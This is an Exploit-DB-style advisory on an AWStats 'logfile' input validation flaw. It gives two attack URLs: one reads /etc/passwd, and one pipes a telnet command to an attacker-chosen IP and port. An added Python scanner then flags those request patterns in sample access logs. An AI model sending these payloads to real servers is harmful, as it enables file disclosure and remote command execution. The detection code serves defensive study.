AWStats (5.0-6.3) Input Validation Hole in 'logfile'

EDB-ID: 407
CVE: N/A
OSVDB-ID: 9109
Author: Johnathan Bat
Published: 2004-08-21
Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>
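
Added example, not part of the original advisory: a Python check that scans web server access log lines for the two request shapes shown above (a `logfile` value naming a filesystem path, and a repeated `logfile` parameter whose value starts with `|`). The log lines, addresses and host name are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined log format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_logfile(target):
    """Return the reasons a request target matches the 'logfile' abuse patterns."""
    parts = urlsplit(target)
    if not parts.path.endswith("awstats.pl"):
        return []
    # parse_qsl decodes %XX and '+'; blank values are kept so repeats are counted.
    params = parse_qsl(parts.query, keep_blank_values=True)
    # Case-insensitive name match is a conservative choice made for this example.
    values = [v.strip() for k, v in params if k.lower() == "logfile"]
    reasons = []
    if len(values) > 1:
        reasons.append("repeated logfile parameter")
    for v in values:
        if v.startswith("|") or v.endswith("|"):
            reasons.append("pipe in logfile value")
        elif v.startswith("/") or ".." in v:
            reasons.append("filesystem path in logfile value")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every log line that is flagged."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        reasons = suspicious_logfile(m.group(1)) if m else []
        if reasons:
            hits.append((n, reasons))
    return hits

# Constructed sample access log (documentation addresses, placeholder host).
SAMPLE = [
    '192.0.2.10 - - [21/Aug/2004:10:00:00 +0000] "GET /cgi-bin/awstats.pl'
    '?config=example.test&framename=main HTTP/1.1" 200 5120',
    '192.0.2.44 - - [21/Aug/2004:10:01:12 +0000] "GET /cgi-bin/awstats.pl'
    '?config=example.test&pluginmode=rawlog&logfile=/etc/passwd HTTP/1.1" 200 901',
    '192.0.2.44 - - [21/Aug/2004:10:01:40 +0000] "GET /cgi-bin/awstats.pl'
    '?config=example.test&pluginmode=rawlog&logfile=&logfile=%7CPLACEHOLDER HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for lineno, why in scan(SAMPLE):
        print(f"line {lineno}: {', '.join(why)}")
```
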


# milw0rm.com [2004-08-21]